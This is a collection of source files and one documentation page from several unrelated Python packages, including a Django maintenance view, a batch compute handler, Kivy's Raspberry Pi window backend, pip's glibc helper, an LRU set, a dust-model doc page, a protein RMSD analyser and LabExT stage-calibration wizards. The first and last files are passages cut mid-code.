pending_tasks = pending_tasks.filter(tool__in=limit_tools)
if sort_by in ['urgency', 'force_shutdown', 'tool', 'problem_category', 'last_updated', 'creation_time']:
if sort_by == 'last_updated':
pending_tasks = pending_tasks.exclude(last_updated=None).order_by('-last_updated')
not_yet_updated_tasks = Task.objects.filter(cancelled=False, resolved=False, last_updated=None).order_by('-creation_time')
pending_tasks = list(chain(pending_tasks, not_yet_updated_tasks))
else:
pending_tasks = pending_tasks.order_by(sort_by)
if sort_by in ['urgency', 'force_shutdown', 'creation_time']:
pending_tasks = pending_tasks.reverse()
else:
pending_tasks = pending_tasks.order_by('urgency').reverse() # Order by urgency by default
closed_tasks = Task.objects.filter(Q(cancelled=True) | Q(resolved=True)).exclude(resolution_time__isnull=True).order_by('-resolution_time')[:20]
dictionary = {
'pending_tasks': pending_tasks,
'closed_tasks': closed_tasks,
}
return render(request, 'maintenance/maintenance.html', dictionary)
@staff_member_required
@require_GET
def task_details(request, task_id):
task = get_object_or_404(Task, id=task_id)
if task.cancelled or task.resolved:
return render(request, 'maintenance/closed_task_details.html', {'task': task})
dictionary = {
'task': task,
"estimated_resolution_time": as_timezone(task.estimated_resolution_time) if task.estimated_resolution_time else None,
'initial_assessment_categories': TaskCategory.objects.filter(stage=TaskCategory.Stage.INITIAL_ASSESSMENT),
'completion_categories': TaskCategory.objects.filter(stage=TaskCategory.Stage.COMPLETION),
'task_statuses': TaskStatus.objects.all(),
}
if task.tool.is_configurable():
dictionary['rendered_configuration_html'] = task.tool.configuration_widget(request.user)
    return render(request, 'maintenance/pending_task_details.html', dictionary)
/FicusFramework-3.1.0.post2.tar.gz/FicusFramework-3.1.0.post2/src/api/handler/ce/AbstractBatchCE.py

import threading
from abc import abstractmethod
from datetime import datetime
from queue import Queue
from concurrent.futures import ThreadPoolExecutor, as_completed
from api.handler.ICacheAbleHandler import ICacheAbleHandler
from api.handler.ITaskHandler import ITaskHandler
from api.handler.outputer.IBatchOutputer import IBatchOutputer
from api.model.BatchOutputPipe import BatchOutputPipe
from api.model.FdInputPipe import FdInputPipe
from api.model.ResultVO import *
from client import ComputeExecutionClient
from schedule.utils.log import TaskLogFileAppender
class AbstractBatchCE(ITaskHandler, IBatchOutputer, ICacheAbleHandler):
"""
    Custom batch CE (compute execution) implementation.
"""
    # Since this implementation may be a singleton, per-execution state is
    # kept in thread-locals.
def __init__(self):
super().__init__()
self.__code_local_host = threading.local()
self.__process_id_local = threading.local()
self.__task_log_id_local = threading.local()
self.__execution_message_local = threading.local()
self.__tasks_local_host = threading.local()
self.killed = False
def __action(self, data_compute_execution, output_stream, params, is_finished, messages):
        # Worker executed on a separate thread to feed data into the output pipe
from schedule import ShardContext
try:
self.set_local_code(
data_compute_execution.site + "_" + data_compute_execution.projectCode + "_" + data_compute_execution.code)
self.set_process_id(params.get("__processLogId__"))
self.__task_log_id_local.key = params.get("__logId__")
self.__execution_message_local.content = []
self.set_site_and_project(data_compute_execution.site, data_compute_execution.projectCode)
TaskLogFileAppender.prepare_to_log(datetime.strptime(params["__triggerTime__"], "%Y-%m-%d %H:%M:%S"),params["__logId__"])
if "__sharding_index__" in params and "__sharding_total__" in params:
from schedule.ShardContext import Sharding
ShardContext.set_sharding(Sharding(params["__sharding_index__"], params["__sharding_total__"]))
self.do_compute(BatchOutputPipe(output_stream, len(data_compute_execution.outputFdCodes)),
FdInputPipe(data_compute_execution.site, data_compute_execution.projectCode, data_compute_execution.sourceFdCodes), params)
finally:
            # Clean up the thread-local message and code state
is_finished[0] = True
messages[0] = "success" if self.__execution_message_local.content is None or len(
self.__execution_message_local.content) == 0 else str(self.__execution_message_local.content)
self.clear_local_code()
self.clear_process_id()
self.clear_site_and_project()
self.__task_log_id_local.key = None
self.__execution_message_local.content = None
ShardContext.reset()
TaskLogFileAppender.end_log()
def execute(self, params):
if params is None or len(params) == 0 or ("site_" not in params) or ("projectCode_" not in params) or (
"code_" not in params):
# 不存在crawl的信息,没法执行
return ResultVO(FAIL_CODE, "执行失败,没有ce的信息")
self.__tasks_local_host.tasks = []
output_stream = Queue()
self.killed = False
with ThreadPoolExecutor(max_workers=2,thread_name_prefix="batch-ce-") as executor:
            # The logic works like this:
            # 1. Hand a queue to the worker thread, then asynchronously wait
            #    for that thread to finish.
try:
data_compute_execution = ComputeExecutionClient.get(params["site_"], params["projectCode_"],
params["code_"])
if data_compute_execution is None:
return ResultVO(FAIL_CODE, f"执行失败,没有找到Code:{params['code_']}的ce")
is_finished = [False]
messages = [None]
self.__tasks_local_host.tasks.append(executor.submit(self.__action,data_compute_execution,output_stream,params,is_finished,messages))
                # Add the thread that sends out the results
self.__tasks_local_host.tasks.append(
executor.submit(self.batch_output, params["site_"], params["projectCode_"], params["code_"], data_compute_execution.outputFdCodes, is_finished, output_stream,params))
                # Block the main thread until both tasks complete
for future in as_completed(self.__tasks_local_host.tasks):
try:
data = future.result()
except Exception as e:
import traceback
return ResultVO(FAIL_CODE, f"执行失败,Code:{params['code_']}的CE,原因:\n{traceback.format_exc()}")
if messages[0] is not None:
return ResultVO(SUCCESS_CODE, messages[0])
return SUCCESS
finally:
self.__tasks_local_host.tasks.clear()
executor.shutdown(wait=True)
output_stream.queue.clear()
def kill(self):
self.killed = True
if self.__tasks_local_host.tasks is not None:
for task in self.__tasks_local_host.tasks:
try:
task._stop()
except:
pass
def is_killed(self):
return self.killed
def get_execution_message_cache(self):
"""
        Return the message cache.
:return:
"""
return self.__execution_message_local.content
def get_batch_size(self) -> int:
        # TODO: batch size is hard-coded to 100 for now
return 100
def get_code_thread_local(self):
"""
        Thread-local holding the code of the current execution context.
:return:
"""
return self.__code_local_host
def get_process_thread_local(self):
"""
        Thread-local holding the process id of the current context.
:return:
"""
return self.__process_id_local
def get_task_log_id(self):
return self.__task_log_id_local.key
@abstractmethod
def do_compute(self, output_stream: BatchOutputPipe, source_fds: FdInputPipe, params: dict):
"""
        Perform the actual data-mining logic.
        :param output_stream: data output pipe
        :param source_fds: CE input pipe
        :param params: required parameters
        :return:
        """
/Kivy-2.2.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl/kivy/core/window/window_egl_rpi.py

__all__ = ('WindowEglRpi', )
from kivy.logger import Logger
from kivy.core.window import WindowBase
from kivy.base import EventLoop
from kivy.lib.vidcore_lite import bcm, egl
from os import environ
# Default display IDs.
(DISPMANX_ID_MAIN_LCD,
DISPMANX_ID_AUX_LCD,
DISPMANX_ID_HDMI,
DISPMANX_ID_SDTV,
DISPMANX_ID_FORCE_LCD,
DISPMANX_ID_FORCE_TV,
DISPMANX_ID_FORCE_OTHER) = range(7)
class WindowEglRpi(WindowBase):
_rpi_dispmanx_id = int(environ.get("KIVY_BCM_DISPMANX_ID", "0"))
_rpi_dispmanx_layer = int(environ.get("KIVY_BCM_DISPMANX_LAYER", "0"))
gl_backends_ignored = ['sdl2']
def create_window(self):
bcm.host_init()
w, h = bcm.graphics_get_display_size(self._rpi_dispmanx_id)
Logger.debug('Window: Actual display size: {}x{}'.format(
w, h))
self._size = w, h
self._create_window(w, h)
self._create_egl_context(self.win, 0)
super(WindowEglRpi, self).create_window()
def _create_window(self, w, h):
dst = bcm.Rect(0, 0, w, h)
src = bcm.Rect(0, 0, w << 16, h << 16)
display = egl.bcm_display_open(self._rpi_dispmanx_id)
update = egl.bcm_update_start(0)
element = egl.bcm_element_add(
update, display, self._rpi_dispmanx_layer, dst, src)
self.win = egl.NativeWindow(element, w, h)
egl.bcm_update_submit_sync(update)
def _create_egl_context(self, win, flags):
api = egl._constants.EGL_OPENGL_ES_API
c = egl._constants
attribs = [
c.EGL_RED_SIZE, 8,
c.EGL_GREEN_SIZE, 8,
c.EGL_BLUE_SIZE, 8,
c.EGL_ALPHA_SIZE, 8,
c.EGL_DEPTH_SIZE, 16,
c.EGL_STENCIL_SIZE, 8,
c.EGL_SURFACE_TYPE, c.EGL_WINDOW_BIT,
c.EGL_NONE]
attribs_context = [c.EGL_CONTEXT_CLIENT_VERSION, 2, c.EGL_NONE]
display = egl.GetDisplay(c.EGL_DEFAULT_DISPLAY)
egl.Initialise(display)
egl.BindAPI(c.EGL_OPENGL_ES_API)
egl.GetConfigs(display)
config = egl.ChooseConfig(display, attribs, 1)[0]
surface = egl.CreateWindowSurface(display, config, win)
context = egl.CreateContext(display, config, None, attribs_context)
egl.MakeCurrent(display, surface, surface, context)
self.egl_info = (display, surface, context)
egl.MakeCurrent(display, surface, surface, context)
def close(self):
egl.Terminate(self.egl_info[0])
def flip(self):
if not EventLoop.quit:
            egl.SwapBuffers(self.egl_info[0], self.egl_info[1])
/Electrum-CHI-3.3.8.tar.gz/Electrum-CHI-3.3.8/packages/pip/_internal/utils/glibc.py

from __future__ import absolute_import
import ctypes
import re
import warnings
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import Optional, Tuple
def glibc_version_string():
# type: () -> Optional[str]
"Returns glibc version string, or None if not using glibc."
# ctypes.CDLL(None) internally calls dlopen(NULL), and as the dlopen
# manpage says, "If filename is NULL, then the returned handle is for the
# main program". This way we can let the linker do the work to figure out
# which libc our process is actually using.
process_namespace = ctypes.CDLL(None)
try:
gnu_get_libc_version = process_namespace.gnu_get_libc_version
except AttributeError:
# Symbol doesn't exist -> therefore, we are not linked to
# glibc.
return None
# Call gnu_get_libc_version, which returns a string like "2.5"
gnu_get_libc_version.restype = ctypes.c_char_p
version_str = gnu_get_libc_version()
# py2 / py3 compatibility:
if not isinstance(version_str, str):
version_str = version_str.decode("ascii")
return version_str
# Separated out from have_compatible_glibc for easier unit testing
def check_glibc_version(version_str, required_major, minimum_minor):
# type: (str, int, int) -> bool
# Parse string and check against requested version.
#
# We use a regexp instead of str.split because we want to discard any
# random junk that might come after the minor version -- this might happen
# in patched/forked versions of glibc (e.g. Linaro's version of glibc
# uses version strings like "2.20-2014.11"). See gh-3588.
m = re.match(r"(?P<major>[0-9]+)\.(?P<minor>[0-9]+)", version_str)
if not m:
warnings.warn("Expected glibc version with 2 components major.minor,"
" got: %s" % version_str, RuntimeWarning)
return False
return (int(m.group("major")) == required_major and
int(m.group("minor")) >= minimum_minor)
def have_compatible_glibc(required_major, minimum_minor):
# type: (int, int) -> bool
version_str = glibc_version_string() # type: Optional[str]
if version_str is None:
return False
return check_glibc_version(version_str, required_major, minimum_minor)
# platform.libc_ver regularly returns completely nonsensical glibc
# versions. E.g. on my computer, platform says:
#
# ~$ python2.7 -c 'import platform; print(platform.libc_ver())'
# ('glibc', '2.7')
# ~$ python3.5 -c 'import platform; print(platform.libc_ver())'
# ('glibc', '2.9')
#
# But the truth is:
#
# ~$ ldd --version
# ldd (Debian GLIBC 2.22-11) 2.22
#
# This is unfortunate, because it means that the linehaul data on libc
# versions that was generated by pip 8.1.2 and earlier is useless and
# misleading. Solution: instead of using platform, use our code that actually
# works.
def libc_ver():
# type: () -> Tuple[str, str]
"""Try to determine the glibc version
Returns a tuple of strings (lib, version) which default to empty strings
in case the lookup fails.
"""
glibc_version = glibc_version_string()
if glibc_version is None:
return ("", "")
else:
return ("glibc", glibc_version) | PypiClean |
/Divisi-0.6.10.tar.gz/Divisi-0.6.10/csc/divisi/recycling_set.py

from ordered_set import OrderedSet
from priodict import priorityDictionary
class RecyclingSet(OrderedSet):
__slots__ = ['items', 'indices', 'index', 'indexFor', '__contains__',
'__getitem__', '__len__', 'count', 'maxsize',
'drop_listeners', 'priority']
def __init__(self, maxsize, origitems=None):
self.count = 0
self.maxsize = maxsize
self.priority = priorityDictionary()
self.drop_listeners = []
OrderedSet.__init__(self, origitems)
def __getstate__(self):
return (self.items, self.priority, self.maxsize, self.count)
def __setstate__(self, state):
items, self.priority, self.maxsize, self.count = state
OrderedSet.__setstate__(self, items)
def add(self, key):
"""
Add an item to the set (unless it's already there),
returning its index. Drop an old item if necessary.
``None`` is never an element of an OrderedSet.
"""
if key in self.indices:
self.touch(key)
return self.indices[key]
n = len(self.items)
if n < self.maxsize:
self.items.append(key)
if key is not None:
self.indices[key] = n
self.touch(key)
return n
else:
newindex = self.drop_oldest()
self.items[newindex] = key
self.indices[key] = newindex
self.touch(key)
return newindex
append = add
def __delitem__(self, n):
"""
Deletes an item from the RecyclingSet.
"""
oldkey = self.items[n]
del self.indices[oldkey]
self.items[n] = None
self.announce_drop(n, oldkey)
def drop_oldest(self):
"""
Drop the least recently used item, to make room for a new one. Return
the number of the slot that just became free.
"""
slot = self.priority.smallest()
oldest = self.items[slot]
del self[slot]
return slot
def listen_for_drops(self, callback):
"""
If an object needs to know when a slot becomes invalid because its
key gets dropped, it should register a callback with listen_for_drops.
"""
self.drop_listeners.append(callback)
def announce_drop(self, index, key):
"""
Tell all registered listeners that we dropped a key.
"""
for listener in self.drop_listeners:
listener(index, key)
def touch(self, key):
"""
Remember that this key is useful.
"""
if key not in self: raise IndexError
else:
self.count += 1
self.priority[self.index(key, False)] = self.count
def index(self, key, touch=True):
if touch: self.touch(key)
return self.indices[key]
indexFor = index
def __contains__(self, key):
return key in self.indices
def __getitem__(self, key):
if key < self.maxsize and key >= len(self.items):
return None
return self.items[key]
def __len__(self):
return len(self.indices)
def _setup_quick_lookup_methods(self):
        pass
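if __name__ == "__main__":
    # Usage sketch: a 3-slot set that recycles its least recently used slot.
    rs = RecyclingSet(3)
    rs.listen_for_drops(lambda index, key: print("dropped", key, "from slot", index))
    for key in ("a", "b", "c"):
        rs.add(key)
    rs.touch("a")                 # mark "a" as recently used
    rs.add("d")                   # recycles the slot of "b", the LRU key
    print("a" in rs, "b" in rs)   # True False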
/Hyperion-0.9.10.tar.gz/Hyperion-0.9.10/docs/dust/kmh_hg.rst

Kim, Martin, and Hendry (1994) dust with Henyey-Greenstein scattering
=====================================================================
These are dust properties from `Kim, Martin, and Hendry (1994)`_, also known as
KMH. The dust consists of astronomical silicates, graphite, and carbon and the
size distribution was determined using a maximum entropy method. This dust type
is meant to be applicable to the diffuse ISM (for low column densities) in the
Galaxy.
.. note:: The dust properties given here are given per unit mass of
**gas+dust**, assuming a gas-to-dust ratio of 141.84. This means that
when using Hyperion, the total gas+dust densities should be specified.
This version of the dust file is take directly from `HOCHUNK`_, the radiative
transfer code developed by B. Whitney et al. This is the dust you should use if
you want to reproduce results from that code, and it approximates the
scattering with a Henyey-Greenstein function. However, if you are interested in
the best version of the KMH dust, with full scattering properties, you can find
this under :doc:`kmh`.
The dust file is available in the ``hyperion-dust`` directory as
``dust_files/kmh94_3.1_hg.hdf5`` (once you have run
``python setup.py build_dust``).
Rv=3.1 (``dust_files/kmh94_3.1_hg.hdf5``)
-------------------------------------------
The following plot gives an overview of the dust properties (as described in
:doc:`../setup/setup_dust`):
.. image:: kmh94_3.1_hg.png
:width: 800px
:align: center
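
As a usage sketch (assuming Hyperion's standard model API; the density array
and grid set-up are placeholders), the dust file is referenced by file name
when adding a density grid:

.. code-block:: python

    from hyperion.model import Model

    m = Model()
    # ... grid and density set-up omitted ...
    m.add_density_grid(density, 'dust_files/kmh94_3.1_hg.hdf5')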
.. _Kim, Martin, and Hendry (1994): http://dx.doi.org/10.1086/173714
.. _HOCHUNK: http://gemelli.colorado.edu/~bwhitney/codes/codes.html
/FragPELE-2.1.1.tar.gz/FragPELE-2.1.1/frag_pele/Analysis/sidecahins_analyser.py

import sys
import os
import numpy as np
import prody
import argparse
# Local import
from rmsd_computer import superimpose_backbones
from interaction_detector import pdb2prody
from interaction_detector import select_atom_given_name_type_and_num
def parse_arguments():
"""
Parse user arguments
Output: list with all the user arguments
"""
# All the docstrings are very provisional and some of them are old, they would be changed in further steps!!
parser = argparse.ArgumentParser(description="""""")
required_named = parser.add_argument_group('required named arguments')
# Growing related arguments
required_named.add_argument("-t", "--type", required=True, choices=['sidechains', 'atom_distances'],
help="""Computation type that you want to do. Choose between: sidechains,
atom_distances. """)
required_named.add_argument("-pdbt", "--pdb_target", required=True,
help="""Target pdb file. """)
parser.add_argument("-pdbr", "--pdb_reference",
help="""Reference pdb file.""")
parser.add_argument("-a", "--area", default=False,
help=""""The area (volume) that will be used to select which amino acids are close to the
ligand. THE USAGE OF THIS FLAG HAS NOT BEEN DEBUG SO IS NOT RECOMMENDED TO ACTIVATE IT.""")
parser.add_argument("-ch", "--chain", default="L",
help="Name of the ligand's chain")
parser.add_argument("-o", "--out", default="report_rmsd.txt",
help="Output file name.")
parser.add_argument("-rf", "--res_file", default=False,
help="""Filename that contains which amino acids do you want to select to do the rmsd
computations.""")
args = parser.parse_args()
return args.type, args.pdb_reference, args.pdb_target, args.area, args.out, args.chain, args.res_file
def read_selecteds_from_file(filepath):
residues_id_list = []
with open(filepath, "r") as in_file:
for aminoacid in in_file.readlines():
residues_id_list.append(aminoacid)
return [a.strip("\n") for a in residues_id_list]
def sidechains_rmsd_calculator(pdb_target, pdb_reference, res_file=False, area=False, write2report=False, ligand_chain="L"):
"""
:param pdb_target: problem pdb file
:param pdb_reference: reference pdb file
    :param res_file: file listing the residue numbers to use for the RMSD computation
    :param area: radius (in Angstroms) of the selection sphere around the ligand
    :param write2report: if set, filename of the report to write
    :param ligand_chain: name of the chain of the ligand
    :return: superposes the backbone of the pdb_target onto the pdb_reference and computes the RMSD for each side
chain in the selection area
"""
target, reference = superimpose_backbones(pdb_target, pdb_reference)
if area:
print("Selection set of {} Amstrongs".format(area))
selected_area_target = reference.select("protein and (within {} of chain {})".format(area, ligand_chain))
unique_residues_target = sorted(set(selected_area_target.getResnums()))
elif res_file:
aminoacids_list = read_selecteds_from_file(res_file)
print("Searching the following amino acids: {}".format(aminoacids_list))
selected_area_target = reference.select("resnum {}".format(' '.join(aminoacids_list)))
unique_residues_target = sorted(set(selected_area_target.getResnums()))
else:
print("Please, set an input file or a radii to determine which amino acids will be used to compute the RMSD.")
list_of_results = []
for residue_target in unique_residues_target:
res_selected_target = target.select("protein and resnum {} and heavy".format(residue_target))
res_selected_reference = reference.select("protein and resnum {} and heavy".format(residue_target))
target_CA = target.select("protein and resnum {} and name CA".format(residue_target))
reference_CA = reference.select("protein and resnum {} and name CA".format(residue_target))
try:
RMSD = prody.calcRMSD(res_selected_reference, res_selected_target)
distance_bet_CA = prody.calcRMSD(reference_CA, target_CA)
        except Exception:
            print("ERROR: different number of atoms in residue {}".format(residue_target))
            print("ATOMS of the TARGET: {}".format(res_selected_target.getNames()))
            print("ATOMS of the REFERENCE: {}".format(res_selected_reference.getNames()))
            continue  # RMSD is undefined for this residue; skip it
residue_information = (residue_target, res_selected_target.getResnames()[0], RMSD, distance_bet_CA)
list_of_results.append(residue_information)
print(residue_information)
if write2report:
filename = write2report
with open(filename, "w") as report:
for result in list_of_results:
report.write("{:4d}\t{}\t{:5.3f}\t{:5.3f}\t{:5.3f}\n".format(result[0], result[1], float(result[2]),
float(result[3]), (float(result[2]) - float(result[3]))))
def compute_atom_distances(pdb_target, res_file, output_report, chain="L"):
"""
    This function calculates atom-atom distances between ligand and residue atoms. The residue number and atom names
    (for both the ligand and the residue) must be specified in a file ('res_file').
    :param pdb_target: input PDB file path
    :param res_file: file with instructions. Each row must have the format: RESNUM ATOMNAME(S)_LIGAND
    ATOMNAME(S)_RESIDUE. To compute a distance from a center of mass, write the atoms as [ATOM1,ATOM2,ATOMN]
    :param output_report: filename of the report to write (optional)
    :param chain: name of the ligand's chain
    :return: the report as a single string
"""
# Load PDB files
target = pdb2prody(pdb_target)
ligand = target.select("chain {}".format(chain))
print(ligand.getNames())
# Reading instructions from file
list_of_instructions = read_selecteds_from_file(res_file)
# Select the input atoms
report = []
for line in list_of_instructions:
resnum, atom_name_ref, atom_name_tar = line.split()
# If the user wants to select more than one atom he has to put them in a string with this format: [atom1,atomN...]
if "[" in atom_name_ref or "]" in atom_name_ref:
print("Multiple atom selection for the ligand")
atom_string_with_comas = atom_name_ref.strip("[").strip("]")
atom_list = atom_string_with_comas.split(",")
atom_string = ' '.join(atom_list)
atom_ref_selected = ligand.select("name {}".format(atom_string))
print("Selected atoms: {}".format(atom_ref_selected.getNames()))
else:
print("Single atom selection for the ligand")
atom_ref_selected = ligand.select("name {}".format(atom_name_ref))
print("Selected atom: {}".format(atom_ref_selected.getNames()))
if "[" in atom_name_tar or "]" in atom_name_tar:
print("Multiple atom selection for the system")
atom_string_with_comas = atom_name_tar.strip("[").strip("]")
atom_list = atom_string_with_comas.split(",")
atom_string = ' '.join(atom_list)
atom_tar_selected = select_atom_given_name_type_and_num(target, resnum, atom_string)
print("Selected atoms: {}".format(atom_tar_selected.getNames()))
else:
print("Single atom selection for the system")
atom_tar_selected = select_atom_given_name_type_and_num(target, resnum, atom_name_tar)
print("Selected atom: {}".format(atom_tar_selected.getNames()))
try:
number_of_selected_atoms_ref = len(atom_ref_selected.getNames())
except AttributeError:
exit("None atoms where selected. Please, check if the selected atoms exists in the ligand in {}".format(pdb_target))
try:
number_of_selected_atoms_tar = len(atom_tar_selected.getNames())
except AttributeError:
exit("None atoms where selected. Please, check if the selected atoms exists in the residue {} in {}".format(resnum, pdb_target))
# Now there are four possibilities: len 1 in target and ref, len > 1 in one of both and len >1 in both.
# If the len is more than 1 we will use the center of mass as a point to compute the distance.
if number_of_selected_atoms_ref <= 1 and number_of_selected_atoms_tar <= 1:
distance = prody.calcDistance(atom_tar_selected, atom_ref_selected)
elif number_of_selected_atoms_ref <= 1 and number_of_selected_atoms_tar > 1:
center_tar = prody.calcCenter(atom_tar_selected)
atom_coords = atom_ref_selected.getCoords()[0]
distance = np.linalg.norm(center_tar - atom_coords)
elif number_of_selected_atoms_ref > 1 and number_of_selected_atoms_tar <= 1:
center_ref = prody.calcCenter(atom_ref_selected)
atom_coords = atom_tar_selected.getCoords()[0]
distance = np.linalg.norm(atom_coords - center_ref)
else:
center_tar = prody.calcCenter(atom_tar_selected)
center_ref = prody.calcCenter(atom_ref_selected)
distance = np.linalg.norm(center_tar-center_ref)
report_line = "{:4} {:10} {:10} {:6.3f}\n".format(resnum, ''.join(atom_ref_selected.getNames()),
''.join(atom_tar_selected.getNames()), distance)
report.append(report_line)
report_final = ''.join(report)
if output_report:
with open(output_report, "w") as report_file:
report_file.write(report_final)
print(report_final)
return report_final
if __name__ == '__main__':
type, pdb_reference, pdb_target, area, write2report, chain, res_file = parse_arguments()
if type == "sidechains":
sidechains_rmsd_calculator(pdb_target, pdb_reference, res_file, area, write2report, chain)
if type == "atom_distances":
compute_atom_distances(pdb_target, res_file, write2report, chain) | PypiClean |
/LabExT_pkg-2.2.0.tar.gz/LabExT_pkg-2.2.0/LabExT/View/Movement/MovementWizard.py | from logging import getLogger
from functools import partial
from itertools import product
from tkinter import W, Label, Button, messagebox, StringVar, OptionMenu, Frame, Button, Label, DoubleVar, Entry, BooleanVar, Checkbutton, DISABLED, NORMAL, LEFT, RIGHT, TOP, X
from typing import Type, List
from bidict import bidict
from LabExT.Movement.PathPlanning import SingleModeFiber, StagePolygon
from LabExT.Utils import run_with_wait_window, try_to_lift_window
from LabExT.View.Movement.CoordinatePairingsWindow import CoordinatePairingsWindow
from LabExT.View.Controls.CustomFrame import CustomFrame
from LabExT.View.Controls.CustomTable import CustomTable
from LabExT.View.Controls.Wizard import Step, Wizard
from LabExT.View.Controls.ParameterTable import ParameterTable
from LabExT.Measurements.MeasAPI.Measparam import MeasParamAuto
from LabExT.Movement.config import Orientation, DevicePort, Axis, Direction
from LabExT.Movement.Stage import Stage, StageError
from LabExT.Movement.MoverNew import MoverError, MoverNew, Stage
from LabExT.Movement.Transformations import CoordinatePairing
from LabExT.Movement.Calibration import Calibration
from LabExT.Wafer.Chip import Chip
class StageWizard(Wizard):
"""
Wizard to load stage drivers and connect to stages.
"""
def __init__(self, master, mover, experiment_manager=None):
"""
Constructor for new Stage Wizard.
Parameters
----------
master : Tk
Tk instance of the master toplevel
mover : Mover
Instance of the current mover.
experiment_manager : ExperimentManager = None
Optional instance of the current experiment manager
"""
super().__init__(
master,
width=1100,
height=800,
on_finish=self.finish,
next_button_label="Next Step",
previous_button_label="Previous Step",
cancel_button_label="Cancel",
finish_button_label="Finish Setup",
)
self.title("Configure Mover")
self.mover: Type[MoverNew] = mover
self.experiment_manager = experiment_manager
self.load_driver_step = StageDriverStep(self, self.mover)
self.stage_assignment_step = StageAssignmentStep(self, self.mover)
self.load_driver_step.next_step = self.stage_assignment_step
self.stage_assignment_step.previous_step = self.load_driver_step
self.current_step = self.load_driver_step
def finish(self) -> bool:
"""
Creates calibrations and connect to stages.
"""
if self.mover.has_connected_stages:
if messagebox.askokcancel(
"Proceed?",
"You have already created stages. If you continue, they will be reset, including the calibrations. Proceed?",
parent=self):
self.mover.reset_calibrations()
else:
return False
self.stage_assignment_step.update_polygon_cfg()
for stage, assignment in self.stage_assignment_step.assignment.items():
orientation, port = assignment
polygon_cls, polygon_cls_cfg = self.stage_assignment_step.polygon_cfg.get(stage, (
self.stage_assignment_step.DEFAULT_POLYGON,
self.stage_assignment_step.DEFAULT_POLYGON.get_default_parameters()))
stage_polygon = polygon_cls(
orientation, parameters=polygon_cls_cfg)
try:
run_with_wait_window(
self,
f"Connecting to stage {stage}",
lambda: self.mover.add_stage_calibration(
stage=stage,
orientation=orientation,
port=port,
stage_polygon=stage_polygon))
except (ValueError, MoverError, StageError) as e:
self.mover.reset_calibrations()
messagebox.showerror(
"Error",
f"Connecting to stages failed: {e}",
parent=self)
return False
if not self.experiment_manager:
messagebox.showinfo(
"Stage Setup completed.",
f"Successfully connected to {len(self.stage_assignment_step.assignment)} stage(s).",
parent=self)
else:
if messagebox.askyesnocancel(
"Stage Setup completed.",
f"Successfully connected to {len(self.stage_assignment_step.assignment)} stage(s)."
"Do you want to calibrate the stages now?",
parent=self):
self.destroy()
self.experiment_manager.main_window.open_stage_calibration()
return True
class MoverWizard(Wizard):
"""
Wizard to configure the mover
"""
def __init__(self, master, mover):
"""
Constructor for new Mover Wizard.
Parameters
----------
master : Tk
Tk instance of the master toplevel
mover : Mover
Instance of the current mover.
"""
self.mover: Type[MoverNew] = mover
if not self.mover.has_connected_stages:
raise RuntimeError("No connected stages. Cannot configure mover.")
super().__init__(
master,
width=1100,
height=800,
on_finish=self.finish,
next_button_label="Next Step",
previous_button_label="Previous Step",
cancel_button_label="Cancel",
finish_button_label="Save",
with_sidebar=False
)
self.title("Configure Mover")
self.configure_mover_step = ConfigureMoverStep(self, self.mover)
self.current_step = self.configure_mover_step
def finish(self):
speed_xy = self._get_safe_value(
self.configure_mover_step.xy_speed_var,
float,
self.mover.DEFAULT_SPEED_XY)
speed_z = self._get_safe_value(
self.configure_mover_step.z_speed_var,
float,
self.mover.DEFAULT_SPEED_Z)
acceleration_xy = self._get_safe_value(
self.configure_mover_step.xy_acceleration_var,
float,
self.mover.DEFAULT_ACCELERATION_XY)
z_lift = self._get_safe_value(
self.configure_mover_step.z_lift_var,
float,
self.mover.DEFAULT_Z_LIFT)
if self._warn_user_about_zero_speed(
speed_xy) and self._warn_user_about_zero_speed(speed_z):
try:
self.mover.speed_xy = speed_xy
self.mover.speed_z = speed_z
self.mover.acceleration_xy = acceleration_xy
self.mover.z_lift = z_lift
self.mover.dump_settings()
messagebox.showinfo(
"Mover Setup completed.",
f"Successfully configured mover.",
parent=self)
return True
except Exception as e:
messagebox.showerror(
message=f"Could not setup stages. Reason: {e}",
parent=self)
return False
def _warn_user_about_zero_speed(self, speed) -> bool:
"""
Warns user when settings speed to zero.
Returns True if speed is not zero or user wants to set speed to zero.
"""
if speed == 0.0:
return messagebox.askokcancel(
message="Setting speed to 0 will turn the speed control OFF! \n"
"The stage will now move as fast as possible. Set a different speed if "
"this is not intended. Do you want still to proceed?")
return True
def _get_safe_value(
self,
var: Type[DoubleVar],
to_type: type,
default=None):
"""
Returns the value of a tkinter entry and cast it to a specified type.
If casting or retrieving fails, it returns a default value.
"""
try:
return to_type(var.get())
except (ValueError, TypeError):
return default
class CalibrationWizard(Wizard):
"""
Wizard to calibrate stages.
"""
def __init__(
self,
master,
mover,
chip=None,
experiment_manager=None
) -> None:
"""
Constructor for new Mover Wizard.
Parameters
----------
master : Tk
Tk instance of the master toplevel
mover : Mover
Instance of the current mover.
chip : Chip = None
Optional instance of the current chip.
Required for coordinate pairing step.
experiment_manager : ExperimentManager = None
Optional instance of the current experiment manager
"""
self.mover: Type[MoverNew] = mover
self.chip: Type[Chip] = chip
self.experiment_manager = experiment_manager
if len(self.mover.calibrations) == 0:
raise RuntimeError(
"Calibration not possible without connected stages.")
super().__init__(
master,
width=1100,
height=800,
on_finish=self.finish,
next_button_label="Next Step",
previous_button_label="Previous Step",
cancel_button_label="Cancel",
finish_button_label="Finish Setup",
)
self.title("Configure Mover")
self.calibrate_axes_step = AxesCalibrationStep(self, self.mover)
self.coordinate_pairing_step = CoordinatePairingStep(
self, self.mover, self.chip)
self.calibrate_axes_step.next_step = self.coordinate_pairing_step
self.coordinate_pairing_step.previous_step = self.calibrate_axes_step
self.current_step = self.calibrate_axes_step
def finish(self):
"""
Callback when user wants to finish the calibration.
"""
try:
self.mover.dump_calibrations()
except Exception as err:
messagebox.showerror(
"Error",
f"Could not store calibration settings to disk: {err}",
parent=self)
return False
return True
class StageDriverStep(Step):
"""
Wizard Step to load stage drivers.
"""
def __init__(self, wizard, mover) -> None:
"""
Constructor for new Wizard step for loading drivers.
Parameters
----------
master : Tk
Tk instance of the master toplevel
mover : Mover
Instance of the current mover.
"""
super().__init__(
wizard,
self.build,
title="Driver Settings")
self.mover: Type[MoverNew] = mover
def build(self, frame: Type[CustomFrame]) -> None:
"""
Builds step to load stage drivers.
Parameters
----------
frame : CustomFrame
Instance of a customized Tkinter frame.
"""
frame.title = "Load Stage Drivers"
Label(
frame,
